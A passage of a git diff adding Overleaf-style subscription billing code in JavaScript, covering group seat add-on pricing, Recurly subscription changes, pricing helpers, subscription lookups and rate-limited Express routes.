recurlySubscription.addOns.find( + addOn => addOn.code === MEMBERS_LIMIT_ADD_ON_CODE + )?.quantity ?? 
0
+  // The change request carries the new total add-on quantity, not the number
+  // of seats being added
+  const nextAddonQuantity = currentAddonQuantity + adding
+
+  let changeRequest
+  if (recurlySubscription.hasAddOn(MEMBERS_LIMIT_ADD_ON_CODE)) {
+    // No custom price is provided here: once the subscription is locked to
+    // an add-on at a given price, that price is used for subsequent payments
+    changeRequest = recurlySubscription.getRequestForAddOnUpdate(
+      MEMBERS_LIMIT_ADD_ON_CODE,
+      nextAddonQuantity
+    )
+  } else {
+    let unitPrice
+    const pattern =
+      /^group_(collaborator|professional)_(2|3|4|5|10|20|50)_(educational|enterprise)$/
+    const [, planCode, size, usage] = plan.planCode.match(pattern)
+    const currency = recurlySubscription.currency
+    const planPriceInCents =
+      GroupPlansData[usage][planCode][currency][size].price_in_cents
+    const legacyUnitPriceInCents =
+      GroupPlansData[usage][planCode][currency][size]
+        .additional_license_legacy_price_in_cents
+
+    if (
+      _shouldUseLegacyPricing(
+        recurlySubscription.planPrice,
+        planPriceInCents / 100,
+        usage,
+        size
+      )
+    ) {
+      unitPrice = legacyUnitPriceInCents / 100
+    }
+
+    changeRequest = recurlySubscription.getRequestForAddOnPurchase(
+      MEMBERS_LIMIT_ADD_ON_CODE,
+      nextAddonQuantity,
+      unitPrice
+    )
+  }
+
+  return {
+    changeRequest,
+    currentAddonQuantity,
+    recurlySubscription,
+  }
+}
+
+function _shouldUseLegacyPricing(
+  actualPlanPrice,
+  currentPlanPrice,
+  usage,
+  size
+) {
+  // For small educational groups (5 or fewer members),
+  // 2025 pricing is cheaper than legacy pricing
+  if (size <= 5 && usage === 'educational') {
+    return currentPlanPrice < actualPlanPrice
+  }
+
+  // For all other scenarios,
+  // 2025 pricing is more expensive than legacy pricing
+  return currentPlanPrice > actualPlanPrice
+}
+
+async function previewAddSeatsSubscriptionChange(userId, adding) {
+  const { changeRequest, currentAddonQuantity } =
+    await _addSeatsSubscriptionChange(userId, adding)
+  const paymentMethod = await RecurlyClient.promises.getPaymentMethod(userId)
+  const subscriptionChange =
+    await RecurlyClient.promises.previewSubscriptionChange(changeRequest)
+  const subscriptionChangePreview =
+    await SubscriptionController.makeChangePreview(
+      {
+        type: 'add-on-update',
+        addOn: {
+          code: MEMBERS_LIMIT_ADD_ON_CODE,
+          quantity: subscriptionChange.nextAddOns.find(
+            addon => addon.code === MEMBERS_LIMIT_ADD_ON_CODE
+          ).quantity,
+          prevQuantity: currentAddonQuantity,
+        },
+      },
+      subscriptionChange,
+      paymentMethod
+    )
+
+  return subscriptionChangePreview
+}
+
+async function createAddSeatsSubscriptionChange(userId, adding) {
+  const { changeRequest, recurlySubscription } =
+    await _addSeatsSubscriptionChange(userId, adding)
+  await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest)
+  await SubscriptionHandler.promises.syncSubscription(
+    { uuid: recurlySubscription.id },
+    userId
+  )
+
+  return { adding }
+}
+
+async function _getUpgradeTargetPlanCodeMaybeThrow(subscription) {
+  if (
+    subscription.planCode.includes('professional') ||
+    !subscription.groupPlan
+  ) {
+    throw new Error('Not eligible for group plan upgrade')
+  }
+
+  return subscription.planCode.replace('collaborator', 'professional')
+}
+
+async function _getGroupPlanUpgradeChangeRequest(ownerId) {
+  const olSubscription =
+    await SubscriptionLocator.promises.getUsersSubscription(ownerId)
+
+  await ensureSubscriptionIsActive(olSubscription)
+
+  const newPlanCode = await _getUpgradeTargetPlanCodeMaybeThrow(olSubscription)
+  const recurlySubscription = await RecurlyClient.promises.getSubscription(
olSubscription.recurlySubscription_id + ) + + await ensureSubscriptionCollectionMethodIsNotManual(recurlySubscription) + await ensureSubscriptionHasNoPendingChanges(recurlySubscription) + + return recurlySubscription.getRequestForGroupPlanUpgrade(newPlanCode) +} + +async function getGroupPlanUpgradePreview(ownerId) { + const changeRequest = await _getGroupPlanUpgradeChangeRequest(ownerId) + const subscriptionChange = + await RecurlyClient.promises.previewSubscriptionChange(changeRequest) + const paymentMethod = await RecurlyClient.promises.getPaymentMethod(ownerId) + return SubscriptionController.makeChangePreview( + { + type: 'group-plan-upgrade', + prevPlan: { + name: SubscriptionController.getPlanNameForDisplay( + subscriptionChange.subscription.planName, + subscriptionChange.subscription.planCode + ), + }, + }, + subscriptionChange, + paymentMethod + ) +} + +async function upgradeGroupPlan(ownerId) { + const changeRequest = await _getGroupPlanUpgradeChangeRequest(ownerId) + await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest) + await SubscriptionHandler.promises.syncSubscription( + { uuid: changeRequest.subscription.id }, + ownerId + ) +} + +module.exports = { + removeUserFromGroup: callbackify(removeUserFromGroup), + replaceUserReferencesInGroups: callbackify(replaceUserReferencesInGroups), + ensureFlexibleLicensingEnabled: callbackify(ensureFlexibleLicensingEnabled), + ensureSubscriptionIsActive: callbackify(ensureSubscriptionIsActive), + ensureSubscriptionCollectionMethodIsNotManual: callbackify( + ensureSubscriptionCollectionMethodIsNotManual + ), + ensureSubscriptionHasNoPendingChanges: callbackify( + ensureSubscriptionHasNoPendingChanges + ), + getTotalConfirmedUsersInGroup: callbackify(getTotalConfirmedUsersInGroup), + isUserPartOfGroup: callbackify(isUserPartOfGroup), + getGroupPlanUpgradePreview: callbackify(getGroupPlanUpgradePreview), + upgradeGroupPlan: callbackify(upgradeGroupPlan), + promises: { + removeUserFromGroup, + replaceUserReferencesInGroups, + ensureFlexibleLicensingEnabled, + ensureSubscriptionIsActive, + ensureSubscriptionCollectionMethodIsNotManual, + ensureSubscriptionHasNoPendingChanges, + getTotalConfirmedUsersInGroup, + isUserPartOfGroup, + getUsersGroupSubscriptionDetails, + previewAddSeatsSubscriptionChange, + createAddSeatsSubscriptionChange, + getGroupPlanUpgradePreview, + upgradeGroupPlan, + }, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionHandler.js b/services/web/app/src/Features/Subscription/SubscriptionHandler.js new file mode 100644 index 0000000..f0fdb22 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionHandler.js @@ -0,0 +1,459 @@ +// @ts-check + +const recurly = require('recurly') +const RecurlyWrapper = require('./RecurlyWrapper') +const RecurlyClient = require('./RecurlyClient') +const { User } = require('../../models/User') +const logger = require('@overleaf/logger') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const SubscriptionLocator = require('./SubscriptionLocator') +const LimitationsManager = require('./LimitationsManager') +const EmailHandler = require('../Email/EmailHandler') +const { callbackify } = require('@overleaf/promise-utils') +const UserUpdater = require('../User/UserUpdater') +const { NotFoundError } = require('../Errors/Errors') + +/** + * @import { PaymentProviderSubscription, PaymentProviderSubscriptionChange } from './PaymentProviderEntities' + */ + +async function validateNoSubscriptionInRecurly(userId) { + let subscriptions = + 
await RecurlyWrapper.promises.listAccountActiveSubscriptions(userId) + + if (!subscriptions) { + subscriptions = [] + } + + if (subscriptions.length > 0) { + await SubscriptionUpdater.promises.syncSubscription( + subscriptions[0], + userId + ) + + return false + } + + return true +} + +async function createSubscription(user, subscriptionDetails, recurlyTokenIds) { + const valid = await validateNoSubscriptionInRecurly(user._id) + + if (!valid) { + throw new Error('user already has subscription in recurly') + } + + const recurlySubscription = await RecurlyWrapper.promises.createSubscription( + user, + subscriptionDetails, + recurlyTokenIds + ) + + if (recurlySubscription.trial_started_at) { + const trialStartedAt = new Date(recurlySubscription.trial_started_at) + await UserUpdater.promises.updateUser( + { _id: user._id, lastTrial: { $not: { $gt: trialStartedAt } } }, + { $set: { lastTrial: trialStartedAt } } + ) + } + + await SubscriptionUpdater.promises.syncSubscription( + recurlySubscription, + user._id + ) +} + +/** + * Preview the effect of changing the subscription plan + * + * @param {string} userId + * @param {string} planCode + * @return {Promise<PaymentProviderSubscriptionChange>} + */ +async function previewSubscriptionChange(userId, planCode) { + const subscription = await getSubscriptionForUser(userId) + const changeRequest = subscription?.getRequestForPlanChange(planCode) + const change = + await RecurlyClient.promises.previewSubscriptionChange(changeRequest) + return change +} + +/** + * @param user + * @param planCode + * @param couponCode + */ +async function updateSubscription(user, planCode, couponCode) { + let hasSubscription = false + let subscription + + try { + ;({ hasSubscription, subscription } = + await LimitationsManager.promises.userHasSubscription(user)) + } catch (err) { + logger.warn( + { err, userId: user._id }, + 'there was an error checking user v2 subscription' + ) + } + + if ( + !hasSubscription || + subscription == null || + subscription.recurlySubscription_id == null + ) { + return + } + const recurlySubscriptionId = subscription.recurlySubscription_id + + if (couponCode) { + const usersSubscription = await RecurlyWrapper.promises.getSubscription( + recurlySubscriptionId, + { includeAccount: true } + ) + + await RecurlyWrapper.promises.redeemCoupon( + usersSubscription.account.account_code, + couponCode + ) + } + + const recurlySubscription = await RecurlyClient.promises.getSubscription( + recurlySubscriptionId + ) + const changeRequest = recurlySubscription.getRequestForPlanChange(planCode) + await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest) + await syncSubscription({ uuid: recurlySubscriptionId }, user._id) +} + +/** + * @param user + */ +async function cancelPendingSubscriptionChange(user) { + const { hasSubscription, subscription } = + await LimitationsManager.promises.userHasSubscription(user) + + if (hasSubscription && subscription != null) { + await RecurlyClient.promises.removeSubscriptionChangeByUuid( + subscription.recurlySubscription_id + ) + } +} + +/** + * @param user + */ +async function cancelSubscription(user) { + try { + const { hasSubscription, subscription } = + await LimitationsManager.promises.userHasSubscription(user) + if (hasSubscription && subscription != null) { + await RecurlyClient.promises.cancelSubscriptionByUuid( + subscription.recurlySubscription_id + ) + await _updateSubscriptionFromRecurly(subscription) + const emailOpts = { + to: user.email, + first_name: user.first_name, + } + const 
ONE_HOUR_IN_MS = 1000 * 60 * 60
+      EmailHandler.sendDeferredEmail(
+        'canceledSubscription',
+        emailOpts,
+        ONE_HOUR_IN_MS
+      )
+    }
+  } catch (err) {
+    logger.warn(
+      { err, userId: user._id },
+      'there was an error checking user v2 subscription'
+    )
+  }
+}
+
+/**
+ * @param user
+ */
+async function reactivateSubscription(user) {
+  try {
+    const { hasSubscription, subscription } =
+      await LimitationsManager.promises.userHasSubscription(user)
+    if (hasSubscription && subscription != null) {
+      await RecurlyClient.promises.reactivateSubscriptionByUuid(
+        subscription.recurlySubscription_id
+      )
+      await _updateSubscriptionFromRecurly(subscription)
+      EmailHandler.sendEmail(
+        'reactivatedSubscription',
+        { to: user.email },
+        err => {
+          if (err) {
+            logger.warn(
+              { err },
+              'failed to send reactivation confirmation email'
+            )
+          }
+        }
+      )
+    }
+  } catch (err) {
+    logger.warn(
+      { err, userId: user._id },
+      'there was an error checking user v2 subscription'
+    )
+  }
+}
+
+/**
+ * @param recurlySubscription
+ * @param requesterData
+ */
+async function syncSubscription(recurlySubscription, requesterData) {
+  const storedSubscription = await RecurlyWrapper.promises.getSubscription(
+    recurlySubscription.uuid,
+    { includeAccount: true }
+  )
+
+  const user = await User.findById(storedSubscription.account.account_code, {
+    _id: 1,
+  }).exec()
+
+  if (!user) {
+    throw new Error('no user found')
+  }
+
+  await SubscriptionUpdater.promises.syncSubscription(
+    storedSubscription,
+    user._id,
+    requesterData
+  )
+}
+
+/**
+ * Attempt to collect a past due invoice for a customer. Only do that when
+ * a) the customer is using Paypal and b) there is only one past due invoice.
+ * This is needed because Recurly doesn't always attempt collection of past
+ * due invoices after Paypal billing info was updated.
+ *
+ * @param recurlyAccountCode
+ */
+async function attemptPaypalInvoiceCollection(recurlyAccountCode) {
+  const billingInfo =
+    await RecurlyWrapper.promises.getBillingInfo(recurlyAccountCode)
+
+  if (!billingInfo.paypal_billing_agreement_id) {
+    // this is not a Paypal user
+    return
+  }
+
+  const pastDueInvoices =
+    await RecurlyWrapper.promises.getAccountPastDueInvoices(recurlyAccountCode)
+
+  if (pastDueInvoices.length !== 1) {
+    // no past due invoices, or more than one. Ignore.
+    return
+  }
+
+  return await RecurlyWrapper.promises.attemptInvoiceCollection(
+    pastDueInvoices[0].invoice_number
+  )
+}
+
+async function extendTrial(subscription, daysToExtend) {
+  await RecurlyWrapper.promises.extendTrial(
+    subscription.recurlySubscription_id,
+    daysToExtend
+  )
+}
+
+async function _updateSubscriptionFromRecurly(subscription) {
+  const recurlySubscription = await RecurlyWrapper.promises.getSubscription(
+    subscription.recurlySubscription_id,
+    {}
+  )
+  await SubscriptionUpdater.promises.updateSubscriptionFromRecurly(
+    recurlySubscription,
+    subscription
+  )
+}
+
+/**
+ * Preview the effect of purchasing an add-on
+ *
+ * @param {string} userId
+ * @param {string} addOnCode
+ * @return {Promise<PaymentProviderSubscriptionChange>}
+ */
+async function previewAddonPurchase(userId, addOnCode) {
+  const subscription = await getSubscriptionForUser(userId)
+
+  try {
+    await RecurlyClient.promises.getAddOn(subscription.planCode, addOnCode)
+  } catch (err) {
+    if (err instanceof recurly.errors.NotFoundError) {
+      throw new NotFoundError({
+        message: 'Add-on not found',
+        info: { addOnCode },
+      })
+    }
+    throw err
+  }
+
+  const changeRequest = subscription.getRequestForAddOnPurchase(addOnCode)
+  const change =
+    await RecurlyClient.promises.previewSubscriptionChange(changeRequest)
+  return change
+}
+
+/**
+ * Purchase an add-on for a user
+ *
+ * @param {string} userId
+ * @param {string} addOnCode
+ * @param {number} quantity
+ */
+async function purchaseAddon(userId, addOnCode, quantity) {
+  const subscription = await getSubscriptionForUser(userId)
+  try {
+    await RecurlyClient.promises.getAddOn(subscription.planCode, addOnCode)
+  } catch (err) {
+    if (err instanceof recurly.errors.NotFoundError) {
+      throw new NotFoundError({
+        message: 'Add-on not found',
+        info: { addOnCode },
+      })
+    }
+    throw err
+  }
+  const changeRequest = subscription.getRequestForAddOnPurchase(
+    addOnCode,
+    quantity
+  )
+  await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest)
+  await syncSubscription({ uuid: subscription.id }, userId)
+}
+
+/**
+ * Cancels an add-on for a user
+ *
+ * @param {string} userId
+ * @param {string} addOnCode
+ */
+async function removeAddon(userId, addOnCode) {
+  const subscription = await getSubscriptionForUser(userId)
+  const changeRequest = subscription.getRequestForAddOnRemoval(addOnCode)
+  await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest)
+  await syncSubscription({ uuid: subscription.id }, userId)
+}
+
+/**
+ * Returns the Recurly subscription for the given user
+ *
+ * Throws a NotFoundError if the subscription can't be found
+ *
+ * @param {string} userId
+ * @return {Promise<PaymentProviderSubscription>}
+ */
+async function getSubscriptionForUser(userId) {
+  const subscription =
+    await SubscriptionLocator.promises.getUsersSubscription(userId)
+  const recurlyId = subscription?.recurlySubscription_id
+  if (recurlyId == null) {
+    throw new NotFoundError({
+      message: 'Recurly subscription not found',
+      info: { userId },
+    })
+  }
+
+  try {
+    const subscription = await RecurlyClient.promises.getSubscription(recurlyId)
+    return subscription
+  } catch (err) {
+    if (err instanceof recurly.errors.NotFoundError) {
+      throw new NotFoundError({
+        message: 'Subscription not found',
+        info: { userId, recurlyId },
+      })
+    } else {
+      throw err
+    }
+  }
+}
+
+async function pauseSubscription(user, pauseCycles) {
+  // only allow pausing on monthly plans not in a trial
+  const { subscription } =
+    await LimitationsManager.promises.userHasSubscription(user)
+  if (!subscription || !subscription.recurlyStatus) {
+    throw new Error('No active subscription to pause')
+  }
+
+  if (
+    !subscription.planCode ||
+    subscription.planCode.includes('ann') ||
+    subscription.groupPlan
+  ) {
+    throw new Error('Can only pause monthly individual plans')
+  }
+  if (
+    subscription.recurlyStatus.trialEndsAt &&
+    subscription.recurlyStatus.trialEndsAt > new Date()
+  ) {
+    throw new Error('Cannot pause a subscription in a trial')
+  }
+  if (subscription.addOns?.length) {
+    throw new Error('Cannot pause a subscription with addons')
+  }
+
+  await RecurlyClient.promises.pauseSubscriptionByUuid(
+    subscription.recurlySubscription_id,
+    pauseCycles
+  )
+}
+
+async function resumeSubscription(user) {
+  const { subscription } =
+    await LimitationsManager.promises.userHasSubscription(user)
+  if (!subscription || !subscription.recurlyStatus) {
+    throw new Error('No active subscription to resume')
+  }
+  await RecurlyClient.promises.resumeSubscriptionByUuid(
+    subscription.recurlySubscription_id
+  )
+}
+
+module.exports = {
+  validateNoSubscriptionInRecurly: callbackify(validateNoSubscriptionInRecurly),
+  createSubscription: callbackify(createSubscription),
+  previewSubscriptionChange: callbackify(previewSubscriptionChange),
+  updateSubscription: callbackify(updateSubscription),
+  cancelPendingSubscriptionChange: callbackify(cancelPendingSubscriptionChange),
+  cancelSubscription: callbackify(cancelSubscription),
+  reactivateSubscription: callbackify(reactivateSubscription),
+  syncSubscription: callbackify(syncSubscription),
+  attemptPaypalInvoiceCollection: callbackify(attemptPaypalInvoiceCollection),
+  extendTrial: callbackify(extendTrial),
+  previewAddonPurchase: callbackify(previewAddonPurchase),
+  purchaseAddon: callbackify(purchaseAddon),
+  removeAddon: callbackify(removeAddon),
+  pauseSubscription: callbackify(pauseSubscription),
+  resumeSubscription: callbackify(resumeSubscription),
+  promises: {
+    validateNoSubscriptionInRecurly,
+    createSubscription,
+    previewSubscriptionChange,
+    updateSubscription,
+    cancelPendingSubscriptionChange,
+    cancelSubscription,
+    reactivateSubscription,
+    syncSubscription,
+    attemptPaypalInvoiceCollection,
+    extendTrial,
+    previewAddonPurchase,
+    purchaseAddon,
+    removeAddon,
+    pauseSubscription,
+    resumeSubscription,
+  },
+}
diff --git a/services/web/app/src/Features/Subscription/SubscriptionHelper.js b/services/web/app/src/Features/Subscription/SubscriptionHelper.js
new file mode 100644
index 0000000..efb8895
--- /dev/null
+++ b/services/web/app/src/Features/Subscription/SubscriptionHelper.js
@@ -0,0 +1,92 @@
+const { formatCurrency } = require('../../util/currency')
+const GroupPlansData = require('./GroupPlansData')
+
+/**
+ * If the user changes to a less expensive plan, we shouldn't apply the change immediately.
+ * This is to avoid unintended/artificial credits on users' Recurly accounts.
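+ * For example (hypothetical prices): a change from a 3800-cent plan to a
+ * 1500-cent plan is deferred to the end of the billing term, while the
+ * reverse change can be applied immediately.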
+ */ +function shouldPlanChangeAtTermEnd(oldPlan, newPlan) { + return oldPlan.price_in_cents > newPlan.price_in_cents +} + +/** + * This is duplicated in: + * - services/web/scripts/plan-prices/plans.mjs + * - services/web/modules/subscriptions/frontend/js/pages/plans/group-member-picker/group-plan-pricing.js + * @param {number} number + * @returns {number} + */ +function roundUpToNearest5Cents(number) { + return Math.ceil(number * 20) / 20 +} + +/** + * @import { CurrencyCode } from '../../../../types/subscription/currency' + */ + +/** + * @typedef {Object} PlanToPrice + * @property {string} collaborator + * @property {string} professional + */ + +/** + * @typedef {Object} LocalizedGroupPrice + * @property {PlanToPrice} price + * @property {PlanToPrice} pricePerUser + * @property {PlanToPrice} pricePerUserPerMonth + */ + +/** + * @param {CurrencyCode} recommendedCurrency + * @param {string} locale + * @returns {LocalizedGroupPrice} + */ +function generateInitialLocalizedGroupPrice(recommendedCurrency, locale) { + const INITIAL_LICENSE_SIZE = 2 + + // the price is in cents, so divide by 100 to get the value + const collaboratorPrice = + GroupPlansData.enterprise.collaborator[recommendedCurrency][ + INITIAL_LICENSE_SIZE + ].price_in_cents / 100 + const collaboratorPricePerUser = collaboratorPrice / INITIAL_LICENSE_SIZE + const collaboratorPricePerUserPerMonth = roundUpToNearest5Cents( + collaboratorPrice / INITIAL_LICENSE_SIZE / 12 + ) + const professionalPrice = + GroupPlansData.enterprise.professional[recommendedCurrency][ + INITIAL_LICENSE_SIZE + ].price_in_cents / 100 + const professionalPricePerUser = professionalPrice / INITIAL_LICENSE_SIZE + const professionalPricePerUserPerMonth = roundUpToNearest5Cents( + professionalPrice / INITIAL_LICENSE_SIZE / 12 + ) + + /** + * @param {number} price + * @returns {string} + */ + const formatPrice = price => + formatCurrency(price, recommendedCurrency, locale, true) + + return { + price: { + collaborator: formatPrice(collaboratorPrice), + professional: formatPrice(professionalPrice), + }, + pricePerUser: { + collaborator: formatPrice(collaboratorPricePerUser), + professional: formatPrice(professionalPricePerUser), + }, + pricePerUserPerMonth: { + collaborator: formatPrice(collaboratorPricePerUserPerMonth), + professional: formatPrice(professionalPricePerUserPerMonth), + }, + } +} + +module.exports = { + shouldPlanChangeAtTermEnd, + generateInitialLocalizedGroupPrice, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionLocator.js b/services/web/app/src/Features/Subscription/SubscriptionLocator.js new file mode 100644 index 0000000..ac0fa59 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionLocator.js @@ -0,0 +1,142 @@ +const { callbackifyAll } = require('@overleaf/promise-utils') +const { Subscription } = require('../../models/Subscription') +const { DeletedSubscription } = require('../../models/DeletedSubscription') +const logger = require('@overleaf/logger') +const { + AI_ADD_ON_CODE, + isStandaloneAiAddOnPlanCode, +} = require('./PaymentProviderEntities') +require('./GroupPlansData') // make sure dynamic group plans are loaded + +const SubscriptionLocator = { + async getUsersSubscription(userOrId) { + const userId = SubscriptionLocator._getUserId(userOrId) + const subscription = await Subscription.findOne({ admin_id: userId }).exec() + logger.debug({ userId }, 'got users subscription') + return subscription + }, + + async getUserIndividualSubscription(userOrId) { + const userId = 
SubscriptionLocator._getUserId(userOrId) + const subscription = await Subscription.findOne({ + admin_id: userId, + groupPlan: false, + }).exec() + logger.debug({ userId }, 'got users individual subscription') + return subscription + }, + + async getManagedGroupSubscriptions(userOrId) { + return await Subscription.find({ + manager_ids: userOrId, + groupPlan: true, + }) + .populate('admin_id', ['_id', 'email']) + .exec() + }, + + async getMemberSubscriptions(userOrId, populate = []) { + const userId = SubscriptionLocator._getUserId(userOrId) + // eslint-disable-next-line no-restricted-syntax + return await Subscription.find({ member_ids: userId }) + .populate('admin_id', 'email') + .populate(populate) + .exec() + }, + + async getAdminEmail(subscriptionId) { + const subscription = await Subscription.findById(subscriptionId) + .populate('admin_id', 'email') + .exec() + + return subscription?.admin_id?.email + }, + + async getAdminEmailAndName(subscriptionId) { + const subscription = await Subscription.findById(subscriptionId) + .populate('admin_id', ['email', 'first_name', 'last_name']) + .exec() + + return subscription?.admin_id + }, + + async hasRecurlyGroupSubscription(userOrId) { + const userId = SubscriptionLocator._getUserId(userOrId) + return await Subscription.exists({ + groupPlan: true, + recurlySubscription_id: { $exists: true }, + $or: [ + { member_ids: userId }, + { manager_ids: userId }, + { admin_id: userId }, + ], + }).exec() + }, + + async getSubscription(subscriptionId) { + return await Subscription.findOne({ _id: subscriptionId }).exec() + }, + + async getSubscriptionByMemberIdAndId(userId, subscriptionId) { + return await Subscription.findOne( + { member_ids: userId, _id: subscriptionId }, + { _id: 1 } + ).exec() + }, + + async getGroupSubscriptionsMemberOf(userId) { + return await Subscription.find( + { member_ids: userId }, + { _id: 1, planCode: 1 } + ) + }, + + async getGroupsWithEmailInvite(email) { + return await Subscription.find({ invited_emails: email }).exec() + }, + + async getGroupsWithTeamInvitesEmail(email) { + return await Subscription.find( + { teamInvites: { $elemMatch: { email } } }, + { teamInvites: 1 } + ).exec() + }, + + async getGroupWithV1Id(v1TeamId) { + return await Subscription.findOne({ 'overleaf.id': v1TeamId }).exec() + }, + + async getUserDeletedSubscriptions(userId) { + return await DeletedSubscription.find({ + 'subscription.admin_id': userId, + }).exec() + }, + + async getDeletedSubscription(subscriptionId) { + return await DeletedSubscription.findOne({ + 'subscription._id': subscriptionId, + }).exec() + }, + + async hasAiAssist(userOrId) { + const userId = SubscriptionLocator._getUserId(userOrId) + const subscription = await Subscription.findOne({ admin_id: userId }).exec() + return Boolean( + isStandaloneAiAddOnPlanCode(subscription?.planCode) || + subscription?.addOns?.some(addOn => addOn.code === AI_ADD_ON_CODE) + ) + }, + + _getUserId(userOrId) { + if (userOrId && userOrId._id) { + return userOrId._id + } else if (userOrId) { + return userOrId + } + }, +} + +module.exports = { + ...callbackifyAll(SubscriptionLocator), + promises: SubscriptionLocator, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionRouter.mjs b/services/web/app/src/Features/Subscription/SubscriptionRouter.mjs new file mode 100644 index 0000000..0bb30b5 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionRouter.mjs @@ -0,0 +1,272 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import 
PermissionsController from '../Authorization/PermissionsController.js' +import SubscriptionController from './SubscriptionController.js' +import SubscriptionGroupController from './SubscriptionGroupController.mjs' +import TeamInvitesController from './TeamInvitesController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import Settings from '@overleaf/settings' +import { Joi, validate } from '../../infrastructure/Validation.js' + +const teamInviteRateLimiter = new RateLimiter('team-invite', { + points: 10, + duration: 60, +}) + +const subscriptionRateLimiter = new RateLimiter('subscription', { + points: 30, + duration: 60, +}) + +const MAX_NUMBER_OF_USERS = 20 + +const addSeatsValidateSchema = { + body: Joi.object({ + adding: Joi.number().integer().min(1).max(MAX_NUMBER_OF_USERS).required(), + }), +} + +export default { + apply(webRouter, privateApiRouter, publicApiRouter) { + if (!Settings.enableSubscriptions) { + return + } + + webRouter.get( + '/user/subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + SubscriptionController.userSubscriptionPage + ) + + webRouter.get( + '/user/subscription/thank-you', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.successfulSubscription + ) + + webRouter.get( + '/user/subscription/canceled', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.canceledSubscription + ) + + webRouter.get( + '/user/subscription/recurly/:pageType', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.redirectToHostedPage + ) + + webRouter.delete( + '/subscription/group/user', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.requirePermission('leave-group-subscription'), + SubscriptionGroupController.removeSelfFromGroup + ) + + webRouter.get( + '/user/subscription/group/add-users', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.addSeatsToGroupSubscription + ) + + webRouter.post( + '/user/subscription/group/add-users/preview', + AuthenticationController.requireLogin(), + validate(addSeatsValidateSchema), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.previewAddSeatsSubscriptionChange + ) + + webRouter.post( + '/user/subscription/group/add-users/create', + AuthenticationController.requireLogin(), + validate(addSeatsValidateSchema), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.createAddSeatsSubscriptionChange + ) + + webRouter.post( + '/user/subscription/group/add-users/sales-contact-form', + validate({ + body: Joi.object({ + adding: Joi.number().integer().min(MAX_NUMBER_OF_USERS).required(), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.submitForm + ) + + webRouter.get( + '/user/subscription/group/upgrade-subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.subscriptionUpgradePage + ) + + webRouter.post( + 
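+      // applies the group plan upgrade previewed on the GET route of the same path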
'/user/subscription/group/upgrade-subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.upgradeSubscription + ) + + webRouter.get( + '/user/subscription/group/missing-billing-information', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.missingBillingInformation + ) + + webRouter.get( + '/user/subscription/group/manually-collected-subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.manuallyCollectedSubscription + ) + + webRouter.get( + '/user/subscription/group/subtotal-limit-exceeded', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.subtotalLimitExceeded + ) + + // Team invites + webRouter.get( + '/subscription/invites/:token/', + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + TeamInvitesController.viewInvite + ) + webRouter.get( + '/subscription/invites/', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + TeamInvitesController.viewInvites + ) + webRouter.put( + '/subscription/invites/:token/', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(teamInviteRateLimiter), + PermissionsController.requirePermission('join-subscription'), + TeamInvitesController.acceptInvite + ) + + // recurly callback + publicApiRouter.post( + '/user/subscription/callback', + RateLimiterMiddleware.rateLimit( + new RateLimiter('recurly-callback', { + points: 200, + duration: 60, + }) + ), + AuthenticationController.requireBasicAuth({ + [Settings.apis.recurly.webhookUser]: Settings.apis.recurly.webhookPass, + }), + SubscriptionController.recurlyNotificationParser, + SubscriptionController.recurlyCallback + ) + + // user changes their account state + webRouter.get( + '/user/subscription/preview', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.previewSubscription + ) + webRouter.get( + '/user/subscription/addon/:addOnCode/add', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.previewAddonPurchase + ) + webRouter.post( + '/user/subscription/addon/:addOnCode/add', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + addOnCode: Joi.string(), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.purchaseAddon + ) + webRouter.post( + '/user/subscription/addon/:addOnCode/remove', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + addOnCode: Joi.string(), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.removeAddon + ) + webRouter.post( + 